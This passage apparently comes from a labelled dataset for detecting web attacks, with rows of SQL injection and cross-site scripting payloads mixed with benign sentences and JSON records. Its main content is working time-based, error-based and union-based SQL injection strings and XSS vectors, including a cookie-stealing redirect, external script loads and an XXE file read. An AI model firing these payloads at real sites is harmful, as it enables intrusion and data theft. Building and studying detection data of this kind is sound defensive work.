from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ( ( '%' = '",2,SQLi,11009 "<OBJECT TYPE=""text/x-scriptlet"" DATA=""http://xss.rocks/scriptlet.html""></OBJECT>",1,XSS,1971 "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))#",2,SQLi,12619 "<textarea onmouseleave=""alert(1)"">test</textarea>",1,XSS,5759 Merge the puzzle pieces to complete it.,3,normal,22953 <optgroup onpointerout=alert(1)>XSS</optgroup>,1,XSS,6296 "1' ) ) ) or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select ( elt ( 1808 = 1808,1 ) ) ) ,0x717a767a71 ) ,8666 ) and ( ( ( 'yznn' like 'yznn",2,SQLi,12139 select ( case when ( 6804 = 7050 ) then 6804 else cast ( 1 as int ) / ( select 0 from dual ) end ) from dual--,2,SQLi,13629 "<IMG """"""><SCRIPT>alert(""XSS"")</SCRIPT>""\>",1,XSS,7598 "<tt ondblclick=""alert(1)"">test</tt>",1,XSS,9113 "<iframe srcdoc=""&lt;img src=1 onerror=alert(1)&gt;""></iframe>",1,XSS,3251 <h1 id=x tabindex=1 onactivate=alert(1)></h1>,1,XSS,6573 <noscript onpointerup=alert(1)>XSS</noscript>,1,XSS,6641 She picked up a brochure from the travel agency.,3,normal,23777 1' where 6116 = 6116,2,SQLi,21757 "-9606%"" ) ) ) union all select 8572,8572,8572,8572,8572,8572,8572,8572,8572--",2,SQLi,15422 Where can I select a new theme for my website?,3,normal,23899 "1 ) ) procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 ) and ( ( 4348 = 4348",2,SQLi,12528 1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>,1,XSS,127 "1"" where 3990 = 3990 and 8594 = ( select 8594 from pg_sleep ( 5 ) ) --",2,SQLi,16194 "<q draggable=""true"" ondragenter=""alert(1)"">test</q>",1,XSS,5372 "<style>:target {color: red;}</style><b id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></b>",1,XSS,1241 "<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>?",1,XSS,2291 "1"" where 7371 = 7371 waitfor delay '0:0:5'--",2,SQLi,19148 <svg><figure onload=alert(1)></figure>,1,XSS,8470 1' ) ) rlike sleep ( 5 ) #,2,SQLi,20999 "<~/XSS/*-*/STYLE=xss:e/**/xpression(window.location=""http://www.procheckup.com/?sid=""%2bdocument.cookie)>",1,XSS,1231 "<big onclick=""alert(1)"">test</big>",1,XSS,9203 <strike onpointerleave=alert(1)>XSS</strike>,1,XSS,6983 "<ruby draggable=""true"" ondrag=""alert(1)"">test</ruby>",1,XSS,5180 "1"" and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 4241 = 4241 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) )",2,SQLi,10748 1 ) as hvsk where 7902 = 7902,2,SQLi,20704 "<div draggable=""true"" contenteditable>drag me</div><center ondrop=alert(1) contenteditable>drop here</center>",1,XSS,1060 "<a onpaste=""alert(1)"" contenteditable>test</a>",1,XSS,6264 "UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17#",2,SQLi,15384 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><rp id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></rp>",1,XSS,283 "call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null ) ) ||'",2,SQLi,14870 "<div draggable=""true"" contenteditable>drag me</div><param ondragover=alert(1) contenteditable>drop here</param>",1,XSS,970 "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13",2,SQLi,16025 "1"" ) ) as xbhp where 7527 = 7527",2,SQLi,20361 "<applet onError applet onError=""javascript:javascript:alert(1)""></applet onError>",1,XSS,1941 "{""id"":null,""name"":""Indochinese Tiger""}",3,normal,27270 "1"" ) ) as tngu where 3644 = 3644 union all select null--",2,SQLi,17682 "<style>:target {transform: rotate(180deg);}</style><tfoot id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></tfoot>",1,XSS,621 1'|| ( select 'ucxp' where 6612 = 6612 order by 1--,2,SQLi,18333 "<style>@keyframes x{}</style><rb style=""animation-name:x"" onanimationstart=""alert(1)""></rb>",1,XSS,1744 1 ) ) as kccx where 7547 = 7547 union all select null--,2,SQLi,17798 "-7307' ) ) union all select 5215,5215,5215,5215--",2,SQLi,18611 "select * from users where id = 1 + ( 1 ) union select 1,banner from v$version where rownum = 1 -- 1",2,SQLi,14159 &#0000060;,1,XSS,9850 "<datalist onkeyup=""alert(1)"" contenteditable>test</datalist>",1,XSS,3570 "select * from users where id = 1 or 1<@ = 1 union select 1,version ( ) -- 1",2,SQLi,15587 <colgroup onpointerover=alert(1)>XSS</colgroup>,1,XSS,6118 "{""id"":null,""firstName"":""Jennifer"",""lastName"":""Lin"",""address"":""73 Southern Blvd"",""city"":""990"",""telephone"":""6401918600""}",3,normal,27583 or 1 = 1#,2,SQLi,22472 <menu onblur=alert(1) tabindex=1 id=x></menu><input autofocus>,1,XSS,3180 1' rlike sleep ( 5 ) and 'gtfo' = 'gtfo,2,SQLi,19600 <style onload=alert(1)></style>,1,XSS,9502 [color=red width=expression(alert(123))][color],1,XSS,6101 Identify issues where present.,3,normal,23455 "-9370' ) where 7070 = 7070 or make_set ( 9354 = 9354,7185 ) --",2,SQLi,16983 "1"" ) and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and ( ""pqsp"" = ""pqsp",2,SQLi,10576 Insert link.,3,normal,23082 Where's the court?,3,normal,23541 AND 1 = utl_inaddr.get_host_address ( ( SELECT banner FROM v$version WHERE ROWNUM = 1 ) ) AND 'i' = 'i,2,SQLi,14018 "Riders can also select ""no preference"" to any of these options.",3,normal,25751 "1' ) or 8156 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,15659 "<svg xmlns=""#""><script>alert(1)</script></svg>",1,XSS,6278 "<tt onclick=""alert(1)"">test</tt>",1,XSS,9475 "In the ""Account"" tab, select ""Remove accounts"" and press A.",3,normal,26002 "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29",2,SQLi,13173 "AND 1 = utl_inaddr.get_host_address ( ( SELECT DISTINCT ( granted_role ) FROM ( SELECT DISTINCT ( granted_role ) , ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE = SYS.LOGINUSER ) WHERE LIMIT = 3 ) ) AND 'i' = 'i",2,SQLi,11107 ORDER BY 20#,2,SQLi,22314 "<nav oncopy=""alert(1)"" contenteditable>test</nav>",1,XSS,5726 "( convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 9339 = 9339 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) )",2,SQLi,10855 "-6951"" union all select 2518,2518,2518,2518,2518,2518,2518,2518--",2,SQLi,16677 "<t:set attributeName=""innerHTML"" targetElement=""x"" to=""&lt;img&#11;src=x:x&#11;onerror&#11;=alert(116)&gt;"">//[""'`-->]]>]</div>",1,XSS,631 "1'|| ( select 'vekn' from dual where 4929 = 4929 and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) ) ||'",2,SQLi,11994 select pg_sleep ( 5 ) and 'zfyy' = 'zfyy,2,SQLi,19489 1' and 7533 = 7533 and 'jwgc' = 'jwgc,2,SQLi,19874 <article onpointerenter=alert(1)>XSS</article>,1,XSS,6432 "<hgroup onbeforecopy=""alert(1)"" contenteditable>test</hgroup>",1,XSS,3376 Where's the treasure?,3,normal,23488 "1' ) and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( 'yqzg' = 'yqzg",2,SQLi,12612 "{""id"":null,""name"":""MarineAngemon""}",3,normal,27595 1 where 4787 = 4787,2,SQLi,21958 "1%"" ) ) ) or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --",2,SQLi,13784 "-3733' ) ) or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 5023 = 5023 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ( 'ybgd' = 'ybgd",2,SQLi,10262 "-9891"" union all select 7489#",2,SQLi,20767 "<META HTTP-EQUIV=""Link"" Content=""<http://xss.rocks/xss.css>; REL=stylesheet"">",1,XSS,2115 Select run.,3,normal,24645 "<textarea onkeydown=""alert(1)"" contenteditable>test</textarea>",1,XSS,3218 "1"" ) where 3943 = 3943 and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --",2,SQLi,13149 "<IMG SRC=x onended=""alert(String.fromCharCode(88,83,83))"">",1,XSS,3816 <svg><legend onload=alert(1)></legend>,1,XSS,8324 "<dialog onbeforepaste=""alert(1)"" contenteditable>test</dialog>",1,XSS,3157 "select * from generate_series ( 6414,6414,case when ( 6414 = 6455 ) then 1 else 0 end ) limit 1--",2,SQLi,14320 <multicol onfocusout=alert(1) tabindex=1 id=x></multicol><input autofocus>,1,XSS,2280 "<pre draggable=""true"" ondragenter=""alert(1)"">test</pre>",1,XSS,4601 "<a target=""x"" href=""xssme?xss=%3Cscript%3EaddEventListener%28%22DOMFrameContentLoaded%22,%20function%28e%29%20{e.stopPropagation%28%29;},%20true%29;%3C/script%3E%3Ciframe%20src=%22data:text/html,%253cscript%253eObject.defineProperty%28top,%20%27MyEvent%27,%20{value:%20Object,%20configurable:%20true}%29;function%20y%28%29%20{alert%28top.Safe.get%28%29%29;};event%20=%20new%20Object%28%29;event.type%20=%20%27click%27;event.isTrusted%20=%20true;y%28event%29;%253c/script%253e%22%3E%3C/iframe%3E",1,XSS,15 "<style>@keyframes x{}</style><ruby style=""animation-name:x"" onanimationend=""alert(1)""></ruby>",1,XSS,1648 select * from users where id = 1 + ( \ ) or 1 = 1 -- 1,2,SQLi,17933 <svg id=x tabindex=1 onbeforedeactivate=alert(1)></svg><input autofocus>,1,XSS,2367 /><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x />,1,XSS,4650 "1"" ) ) as ccjk where 1932 = 1932 or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,12221 "<style>@keyframes slidein {}</style><video style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></video>",1,XSS,376 "They could only be taken in Rome itself; and in case of a commander having to renew his auspicia, he must either return to Rome or select a spot in the foreign country to represent the hearth of that city.",3,normal,25316 She planted beautiful flowers in her garden.,3,normal,22903 "<form><a href=""javascript:\u0061lert&#x28;1&#x29;"">X</script><img/*/src=""worksinchrome&colon;prompt&#x28;1&#x29;""/*/onerror='eval(src)'>",1,XSS,527 "<sCRIpt x="">"" src=//15.rs></script>",1,XSS,9134 "AND 1 = utl_inaddr.get_host_address ( ( SELECT DISTINCT ( USERNAME ) FROM ( SELECT DISTINCT ( USERNAME ) , ROWNUM AS LIMIT FROM SYS.ALL_USERS ) WHERE LIMIT = 5 ) ) AND 'i' = 'i",2,SQLi,11585 "1"" ) ) as oiqr where 4073 = 4073 or 8156 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,13934 "1' in boolean mode ) or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) #",2,SQLi,12789 Find entries where valid.,3,normal,23321 "make_set ( 8734 = 8734,sleep ( 5 ) )",2,SQLi,19999 Select your dream career.,3,normal,24330 "1' ) ) ) union all select null,null,null#",2,SQLi,19366 "<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file://c:/boot.ini"">]><foo>&xee;</foo>",1,XSS,531 "-6463"" ) ) ) union all select 3280,3280,3280,3280,3280,3280,3280,3280,3280#",2,SQLi,15620 declare @s varchar(22) select @s =,2,SQLi,20122 -3677' ) ) or 1939 = 4484,2,SQLi,21146 <svg><pre onload=alert(1)></pre>,1,XSS,9464 1' ) ) ) and 6240 = ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and ( ( ( 'bwka' = 'bwka,2,SQLi,12497 "1 ) and make_set ( 8403 = 8403,8899 ) and ( 9761 = 9761",2,SQLi,17802 "1' ) ) ) or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select ( elt ( 1808 = 1808,1 ) ) ) ,0x717a767a71 ) ,8666 ) and ( ( ( 'zpkv' = 'zpkv",2,SQLi,12225 "1"" ) where 2570 = 2570 and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,12606 "1' ) or ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8113 = 8113,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and ( 'lxoc' = 'lxoc",2,SQLi,11195 "{""id"":null,""firstName"":""Johnnie"",""lastName"":""Seah"",""address"":""8 W Cerritos Ave #54"",""city"":""689"",""telephone"":""3311526387""}",3,normal,27432 "1 ) where 1185 = 1185 or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) --",2,SQLi,12027 -3497' order by 1#,2,SQLi,22046 "<iframe onmouseenter=""alert(1)"">test</iframe>",1,XSS,6566 "<sub onbeforecut=""alert(1)"" contenteditable>test</sub>",1,XSS,4705 "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15#",2,SQLi,15306 "-2790"" ) ) as vcvw where 6075 = 6075 or 7078 = 8148--",2,SQLi,18120 "select * from users where id = '1' or $<\ union select 1,@@VERSION -- 1'",2,SQLi,15945 "{""id"":null,""firstName"":""Han"",""lastName"":""Tan"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27292 "<div draggable=""true"" contenteditable>drag me</div><image ondragover=alert(1) contenteditable>drop here</image>",1,XSS,957 <discard onpointerover=alert(1)>XSS</discard>,1,XSS,6678 "<;TABLE BACKGROUND="";javascript:alert(';XSS';)"";>;<;/TABLE>;",1,XSS,3455 "1%' and 6414 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and '%' = '",2,SQLi,12827 "1' ) ) and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) and ( ( 'bemh' = 'bemh",2,SQLi,15164 "<dl onmouseenter=""alert(1)"">test</dl>",1,XSS,8598 "exp/*<A STYLE='no\xss:noxss(""*//*"");xss:ex/*XSS*//*/*/pression(alert(""XSS""))'>",1,XSS,2073 "<div draggable=""true"" contenteditable>drag me</div><command ondrop=alert(1) contenteditable>drop here</command>",1,XSS,958 "select * from users where id = 1 union select 1<@,version ( ) -- 1",2,SQLi,16566 "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17#",2,SQLi,14060 <discard onpointerout=alert(1)>XSS</discard>,1,XSS,7008 "<style>@keyframes slidein {}</style><iframe style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></iframe>",1,XSS,354 "1 and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 )",2,SQLi,13542 OR x=y--,2,SQLi,22500 "-3758' ) ) union all select 9460,9460,9460,9460,9460,9460,9460,9460--",2,SQLi,16333 "<noframes onmouseout=""alert(1)"">test</noframes>",1,XSS,6238 "1%"" ) ) or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( ( ""%"" = """,2,SQLi,12756 <em onpointerleave=alert(1)>XSS</em>,1,XSS,8949 "call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null ) and ( ( ( 9348 = 9348",2,SQLi,14049 "It Is Readily Attainable At Any Time In A Modern Laboratory With Adequate Heating Arrangements, And Is Probably On The Whole The Most Suitable Temperature To Select.",3,normal,25964 <dir onfocusout=alert(1) tabindex=1 id=x></dir><input autofocus>,1,XSS,2922 Select your event.,3,normal,24929 "-2896' ) ) as wisk where 1030 = 1030 union all select 1030,1030,1030,1030#",2,SQLi,15735 /><img/onerror=\x22javascript:alert(1)\x22src=xxx:x />,1,XSS,4646 <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>,1,XSS,663 ( select * from ( select ( sleep ( 5 ) ) ) srmq ) and ( ( ( 3124 = 3124,2,SQLi,16106 `'><script>\x3Bjavascript:alert(1)</script>,1,XSS,7060 "1' ) and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 4241 = 4241 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( 'wdeu' like 'wdeu",2,SQLi,10205 1'+ ( select xwcl where 7997 = 7997,2,SQLi,20073 Select your dream wedding date.,3,normal,24405 "-5008' union all select 1942,1942,1942,1942,1942,1942,1942,1942--",2,SQLi,16714 "<embed onkeyup=""alert(1)"" contenteditable>test</embed>",1,XSS,4792 <nav id=x tabindex=1 onbeforedeactivate=alert(1)></nav><input autofocus>,1,XSS,2358 "1%' ) or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) and ( '%' = '",2,SQLi,11918 select case when 2948 = 7279 then 1 else null end--,2,SQLi,18335 "{""id"":null,""name"":""MagnaGarurumon (SV)""}",3,normal,27159 1'+ ( select 'gtqr' where 5660 = 5660,2,SQLi,19835 1'+ ( select iwbs where 4939 = 4939,2,SQLi,20046 if ( 3593 = 3779 ) select 3593 else drop function qtqy--,2,SQLi,17674 1 and 6240 = ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) # twev,2,SQLi,13636 <script>alert(document.getElementsByTagName('html')[0].innerHTML.match(/'([^']%2b)/)[1])</script>,1,XSS,1562 "AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=5)) AND 'i'='i",2,SQLi,11811 -6777%' ) or 4747 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4747 = 4747 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( '%' = ',2,SQLi,10350 <image2 onpointerover=alert(1)>XSS</image2>,1,XSS,7182 1' in boolean mode ) rlike ( select * from ( select ( sleep ( 5 ) ) ) vwyq ) #,2,SQLi,15373 1' ) or ( select * from ( select ( sleep ( 5 ) ) ) ydpu ) and ( 'brob' = 'brob,2,SQLi,15337 "1%"" or 2367 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,13282 "<table draggable=""true"" ondragend=""alert(1)"">test</table>",1,XSS,4111 Select the correct answer.,3,normal,24293 1%' ) ) and 7989 = 3457,2,SQLi,21319 Can you help me decide where to travel?,3,normal,23720 "javascript:""/*\""/*`/*' /*</template></textarea></noembed></noscript></title></style></script>--><svg onload=/*<html/*/onmouseover=alert()//>",1,XSS,516 "<div draggable=""true"" contenteditable>drag me</div><source ondragover=alert(1) contenteditable>drop here</source>",1,XSS,896 <dir onpointerdown=alert(1)>XSS</dir>,1,XSS,8604 "-5817' in boolean mode ) union all select 2391,2391,2391,2391,2391--",2,SQLi,16429 "{""id"":null,""name"":""Primeape""}",3,normal,27542 "<div draggable=""true"" contenteditable>drag me</div><progress ondrop=alert(1) contenteditable>drop here</progress>",1,XSS,901 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><label id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></label>",1,XSS,209 "In some select markets, prices jumped much more sharply overnight.",3,normal,26003 ><embed src='//ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/charts.swf?allowedDomain=\})))}catch(e){alert(1337)}//' allowscriptaccess=always>,1,XSS,460 "<a href=""\x20javascript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,2432 Select your division.,3,normal,24868 "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--",2,SQLi,13653 "<object draggable=""true"" ondragleave=""alert(1)"">test</object>",1,XSS,3391 "<base onbeforepaste=""alert(1)"" contenteditable>test</base>",1,XSS,3913 "1"" where 7005 = 7005",2,SQLi,21798 "&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&quot;&gt;",1,XSS,554 "1' ) and elt ( 1210 = 1210,sleep ( 5 ) )",2,SQLi,19552 <dir id=x tabindex=1 onfocus=alert(1)></dir>,1,XSS,6920 "-4934"" union all select 5119,5119,5119,5119,5119--",2,SQLi,18464 <noscript id=x tabindex=1 onbeforedeactivate=alert(1)></noscript><input autofocus>,1,XSS,1927 1%' ) and ( select * from ( select ( sleep ( 5 ) ) ) gcrr ) #,2,SQLi,17042 "<input onselect=alert(1) value=""XSS"" autofocus>",1,XSS,6084 Select your success.,3,normal,24934 "Adam Schiff, a Democratic member of the Benghazi committee, said the emails show ""no evidence to support the conspiracy theories advanced about the Benghazi attacks—there was no stand down order, no gun running and no interference with security by the Secretary."" ""The select Committee must now schedule a public hearing with Secretary Clinton so committee members can ask whatever questions they have about her emails, or the events of that tragic day,"" said Schiff, who is also the top Democrat on the select Committee on Intelligence, in a statement Friday.",3,normal,26412 "-2734' ) union all select 5510,5510,5510,5510,5510#",2,SQLi,18303 Select your vary.,3,normal,25045 The Invitation is playing in select theaters and everywhere on demand.,3,normal,25427 "<HTML><BODY><?xml:namespace prefix=""t"" ns=""urn:schemas-microsoft-com:time""><?import namespace=""t"" implementation=""#default#time2""><t:set attributeName=""innerHTML"" to=""XSS<SCRIPT DEFER>alert(""XSS"")</SCRIPT>""></BODY></HTML>",1,XSS,107 "<noframes onkeypress=""alert(1)"" contenteditable>test</noframes>",1,XSS,3043 "select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) and ( 'qfsu' = 'qfsu",2,SQLi,16393 "1%' ) ) ) ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) ) and ( ( ( '%' = '",2,SQLi,10385 "-7111 union all select 2409,2409,2409,2409,2409,2409#",2,SQLi,18117 "<html><BODY><?xml:namespace prefix=""t"" ns=""urn:schemas-microsoft-com:time""><?import namespace=""t"" implementation=""#default#time2""><t:set attributeName=""innerHTML"" to=""XSS<SCRIPT DEFER>document.vulnerable=true</SCRIPT>""></BODY></html>",1,XSS,91 Where's the SQL query?,3,normal,23440 -4768'|| ( select 'dded' from dual where 6499 = 6499 union all select 6499--,2,SQLi,15549 "-3452%' or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 1570 = 1570 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and '%' = '",2,SQLi,10457 "-7884"" where 3297 = 3297 or 2492 = 6158",2,SQLi,19582 "1"" ) and make_set ( 8403 = 8403,8899 ) and ( ""dhss"" = ""dhss",2,SQLi,17325 Select a tea flavor to relax.,3,normal,24259 "1 ) where 7199 = 7199 and 8407 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,14475 view,3,normal,23158 select case when 7717 = 7717 then 1 else null end--,2,SQLi,18357 "1' ) ) as nlfq where 3410 = 3410 or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select ( elt ( 1297 = 1297,1 ) ) ) ,0x717a767a71 ) ) --",2,SQLi,12260 "-3343'|| ( select 'ssvt' where 5179 = 5179 union all select 5179,5179,5179,5179,5179,5179,5179,5179--",2,SQLi,14080 "<u onpaste=""alert(1)"" contenteditable>test</u>",1,XSS,6370 "-8888%' ) union all select 5312,5312,5312,5312,5312,5312,5312,5312--",2,SQLi,16409 Can't select that one.,3,normal,24458 """ or """"*""",2,SQLi,22467 "-eval(""window['pro'%2B'mpt'](8)"")-'",1,XSS,9130 <rt onpointerleave=alert(1)>XSS</rt>,1,XSS,8908 "<;SCRIPT ="";blah""; SRC="";http://ha.ckers.org/xss.js"";>;<;/SCRIPT>;",1,XSS,2722 "1"" ) or 6793 = ( select 6793 from pg_sleep ( 5 ) ) and ( ""baia"" = ""baia",2,SQLi,16043 "select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and ( ( ( '%' = '",2,SQLi,13645 "<td onmouseover=""alert(1)"">test</td>",1,XSS,8786 "1 where 5466 = 5466 and 2388 = benchmark ( 5000000,md5 ( 0x6d457153 ) ) #",2,SQLi,15846 "{""id"":null,""firstName"":""Elaine"",""lastName"":""Wong"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27370 "1 ) ) ) union all select null,null,null#",2,SQLi,19525 "{""id"":null,""firstName"":""Lee"",""lastName"":""Shaun"",""address"":""602 SOUTH MICHIGAN ST, SOUTH BEND IN 46601"",""city"":""579"",""telephone"":""2269950693""}",3,normal,26907 "1 ) ) ) or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) and ( ( ( 1782 = 1782",2,SQLi,10664 document.write(213),1,XSS,9771 "select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and ( ( ( 4537 = 4537",2,SQLi,13423 "<template oncopy=""alert(1)"" contenteditable>test</template>",1,XSS,3764 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><input id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></input>",1,XSS,215 "1%' ) ) union all select null,null,null,null,null,null,null#",2,SQLi,17186 "select sleep ( 5 ) and ""irxg"" = ""irxg",2,SQLi,19904 "Previously, they were able to select up to five out of 20; this round, they were able to select up to three out of ten.",3,normal,25768 "1', ( case when 8260 = 8260 then 1 else null end )",2,SQLi,18451 "<em onmousedown=""alert(1)"">test</em>",1,XSS,8923 -5764 or 3038 = 3038,2,SQLi,21835 <nav id=x tabindex=1 onactivate=alert(1)></nav>,1,XSS,6156 "<map onmousemove=""alert(1)"">test</map>",1,XSS,8360 "-6659' ) where 1256 = 1256 union all select 1256,1256--",2,SQLi,17797 Select your taste.,3,normal,24891 "<isindex oncopy=""alert(1)"" contenteditable>test</isindex>",1,XSS,4169 "-5417 or elt ( 1032 = 1032,3623 )",2,SQLi,20196 Select your succeed.,3,normal,25012 "1%"" ) ) ) union all select null,null,null,null,null,null,null#",2,SQLi,16991 "{""id"":null,""name"":""Tankmon""}",3,normal,27504 "{""id"":null,""name"":""appropriate watch""}",3,normal,27600 "-3649"" ) ) as eydu where 3220 = 3220 or elt ( 8705 = 